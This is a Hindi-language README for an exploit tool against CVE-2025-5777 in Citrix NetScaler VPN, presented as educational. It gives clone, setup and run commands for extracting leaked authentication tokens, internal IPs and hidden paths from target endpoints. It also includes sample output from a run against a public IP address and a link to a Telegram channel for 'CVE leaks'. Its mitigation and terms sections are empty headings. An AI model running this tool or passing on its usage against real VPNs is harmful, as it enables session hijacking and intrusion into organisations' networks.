
CVE-2025-5777 के लिए Async-आधारित शोषण उपकरण जो कमजोर Citrix NetScaler VPN एंडपॉइंट्स से लीक हुए प्रमाणीकरण टोकन, आंतरिक IP और छिपे हुए एंडपॉइंट पथों का पता लगाता है और निकालता है।
एक शक्तिशाली शैक्षिक उपकरण जो Citrix NetScaler VPN को प्रभावित करने वाली CVE-2025-5777 भेद्यता को प्रदर्शित और विश्लेषित करने के लिए डिज़ाइन किया गया है।
यह प्रोजेक्ट GO-TO CVE पहल का हिस्सा है।
⚠️ केवल शैक्षिक उद्देश्यों के लिए। इसे उन सिस्टमों पर उपयोग न करें जिनके स्वामी आप नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति आपके पास नहीं है।
यह स्क्रिप्ट असुरक्षित Citrix VPN एंडपॉइंट्स द्वारा उजागर संवेदनशील आंतरिक टोकन, आंतरिक IP और छिपे हुए एंडपॉइंट पथों का पता लगाने और निकालने का प्रयास करती है।
यह छात्रों, सुरक्षा शोधकर्ताओं और रेड टीम सदस्यों को यह बेहतर ढंग से समझने में मदद करने के लिए बनाया गया है कि वास्तविक दुनिया के CVE कैसे खोजे और विश्लेषित किए जाते हैं।
git clone https://github.com/soltanali0/CVE-2025-5777-Exploit.git
cd CVE-2025-5777-Exploit
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
Python 3.8+ आवश्यक है वैकल्पिक: आप वर्चुअल एनवायरनमेंट का उपयोग कर सकते हैं
python3 exploit.py https://target-vpn.com
--proxy http://127.0.0.1:8080 जोड़ें ताकि Burp/SOCKS के माध्यम से रूट हो सके--silent जोड़ें--output result.json जोड़ेंउदाहरण:
python3 exploit.py https://20.237.190.100 --output leaks.json

[!] Leak analysis:
→ Tokens found: ZWZlNjViZDA4NThj...
→ Paths found: /nf/auth/doLogoff.do, /nf/auth/doEPA.do, /Credential
और

इस CVE के शोषण से बचने के लिए:
यह टूल केवल शैक्षिक और कानूनी शोध उद्देश्यों के लिए जारी किया गया है। इस कोड का उपयोग करके किए गए किसी भी दुरुपयोग या अवैध गतिविधि के लिए डेवलपर कोई जिम्मेदारी नहीं लेता है।
इस टूल का उपयोग करके, आप सहमत हैं कि:
CVE लीक और एक्सप्लॉइट शोध समुदाय से जुड़ें: 👉 https://t.me/GOTOCVE
Ali Soltani द्वारा विकसित – रेड टीमर और CVE शिकारी।
गर्व से GO-TO CVE का हिस्सा।